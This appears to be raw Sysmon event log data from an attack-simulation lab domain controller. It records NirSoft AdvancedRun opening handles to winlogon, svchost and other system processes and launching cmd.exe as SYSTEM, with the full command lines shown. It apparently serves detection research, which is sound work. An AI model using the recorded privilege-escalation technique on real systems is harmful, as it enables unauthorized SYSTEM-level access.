TACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009369Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004009368Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004009367Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009366Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004009365Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004009364Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004009363Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004009362Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004009361Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009360Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004009359Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009358Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004009357Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
veImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKR
ANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004009305Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.707{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004008732Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:46.644{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004008621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.349{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe"C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg 
C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgATTACKRANGE\Administrator 10341000x80000000000000004008620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.347{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004008619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.347{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004008618Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\T